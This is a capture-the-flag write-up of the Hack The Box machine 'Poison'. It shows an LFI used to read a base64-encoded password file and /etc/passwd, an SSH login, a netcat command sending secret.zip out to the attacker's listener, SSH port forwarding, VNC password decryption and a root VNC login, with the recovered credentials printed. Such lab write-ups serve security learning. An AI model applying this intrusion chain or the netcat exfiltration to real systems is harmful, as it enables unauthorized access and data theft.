On this linux box I used a LFI vulnerability in the webserver to get a users password which was encoded 13 times with base64. After finding the password, we read /etc/password and found a username charix. Using that username and password I SSH into the machine. In Charix folder there was a secret.zip. After enumerating the machine I found that VNC is enabled on the machine and I port forwarded VNC to my machine. From there I used a script decrypt the password of the ZIP file. That password was used to connect to VNC as root.
I’ll start with NMAP scan.
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/poisen] └─# nmap -p- -sC -sV --min-rate 10000 10.10.10.84 -oN nmap.ver Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-04 17:08 EST Warning: 10.10.10.84 giving up on port because retransmission cap hit (10). Nmap scan report for 10.10.10.84 Host is up (0.041s latency). Not shown: 52213 filtered tcp ports (no-response), 13320 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0) | ssh-hostkey: | 2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA) | 256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA) |_ 256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519) 80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32) |_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32 |_http-title: Site doesn't have a title (text/html; charset=UTF-8). Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
Only two ports open, 22 and 80. I notice that the Apache and OpenSSH is running on FreeBSD.
It looks like a website to test .php scripts. So I type in the different .php files listed on the site.
One of the files was interesting. This shows an array with files. Looking closely we can see that there is a txt file called pwdbackup.txt.
Typing that file in the URL we get an base64 encoded text.
From the text above we can see that it is ecoded atleast 13 times. So decoding it 13 times we end up with Charix!2#4%6&8(0.
LFI – Reading /etc/passwd
Now that we the password, we need a username. From the password we can see that the first 6 characters looks like a username. But I want to verify it. Since we know that there is an LFI vulnerability, we could try and read /etc/passwd.
Shell as Charix
Now that we have a username and password we can SSH into the target machine.
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/poisen] └─# ssh email@example.com 255 ⨯ Enter passphrase for key '/root/.ssh/id_rsa': (firstname.lastname@example.org) Password for charix@Poison: (email@example.com) Password for charix@Poison: Last login: Mon Mar 19 16:38:00 2018 from 10.10.14.4 FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017 Welcome to FreeBSD! Release Notes, Errata: https://www.FreeBSD.org/releases/ Security Advisories: https://www.FreeBSD.org/security/ FreeBSD Handbook: https://www.FreeBSD.org/handbook/ FreeBSD FAQ: https://www.FreeBSD.org/faq/ Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/ FreeBSD Forums: https://forums.FreeBSD.org/ Documents installed with the system are in the /usr/local/share/doc/freebsd/ directory, or can be installed later with: pkg install en-freebsd-doc For other languages, replace "en" with a language code like de or fr. Show the version of FreeBSD installed: freebsd-version ; uname -a Please include that output and any error messages when posting questions. Introduction to manual pages: man man FreeBSD directory layout: man hier Edit /etc/motd to change this login announcement. Want to use sed(1) to edit a file in place? Well, to replace every 'e' with an 'o', in a file named 'foo', you can do: sed -i.bak s/e/o/g foo And you'll get a backup of the original in a file named 'foo.bak', but if you want no backup: sed -i '' s/e/o/g foo charix@Poison:~ %
Looking in Charix’s folder, there is a zip file called secret.zip. I’ll transfer that to my machine and analyze it. It dosent look useful to me as of now, so I’ll continue to enumerate the machine.
charix@Poison:~ % nc 10.10.14.18 4444 -w 3 < secret.zip
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/poisen] └─# nc -lvnp 4444 > secret.zip listening on [any] 4444 ... connect to [10.10.14.18] from (UNKNOWN) [10.10.10.84] 42937
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/poisen] └─# unzip secret.zip Archive: secret.zip [secret.zip] secret password:
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/poisen] └─# cat sdasd ��[|Ֆz!
Looking at what ports are running on the machine I notice that there are two ports that didnt show up in the NMAP scan. Port 5801 and port 5901.
charix@Poison:~ % netstat -a Active Internet connections (including servers) Proto Recv-Q Send-Q Local Address Foreign Address (state) tcp4 0 0 *.5802 *.* LISTEN tcp4 0 0 *.5902 *.* LISTEN tcp4 0 0 *.6002 *.* LISTEN tcp4 0 0 10.10.10.84.ssh 10.10.14.18.32788 ESTABLISHED tcp4 0 0 localhost.smtp *.* LISTEN tcp4 0 0 *.http *.* LISTEN tcp6 0 0 *.http *.* LISTEN tcp4 0 0 *.ssh *.* LISTEN tcp6 0 0 *.ssh *.* LISTEN tcp4 0 0 localhost.5801 *.* LISTEN tcp4 0 0 localhost.5901 *.* LISTEN udp4 0 0 *.syslog *.* udp6 0 0 *.syslog *.*
After some googling; the 5901 is a VNC. So I’ll port forward that port using SSH.
┌──(root💀kali)-[/home/aghanim] └─# ssh -L 5901:127.0.0.1:5901 firstname.lastname@example.org
Cracking the zip file
Now that we know that there is VNC running on the machine, I’ll use trinitronx‘s script to decrypt the password of the zip file.
┌──(root💀kali)-[/home/…/Desktop/HTB/poisen/vncpasswd.py] └─# python2 vncpasswd.py -d -f ../secret 1 ⨯ Decrypted Bin Pass= 'VNCP@$$!' Decrypted Hex Pass= '564e435040242421'
Shell as root
┌──(root💀kali)-[/home/aghanim] └─# vncviewer localhost:5901 1 ⨯ Connected to RFB server, using protocol version 3.8 Enabling TightVNC protocol extensions Performing standard VNC authentication Password: Authentication successful Desktop name "root's X desktop (Poison:1)" VNC server default format: 32 bits per pixel. Least significant byte first in each pixel. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0 Using default colormap which is TrueColor. Pixel format: 32 bits per pixel. Least significant byte first in each pixel. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0 Same machine: preferring raw encoding
What I’ve learned
- Sometimes clues found earlier on will be useful later on the enumeration. Dont get stuck on one thing too long, move forward and come back later after discovering new things.
- Enumerating what running on the machine is important as that can lead to privilege escalation.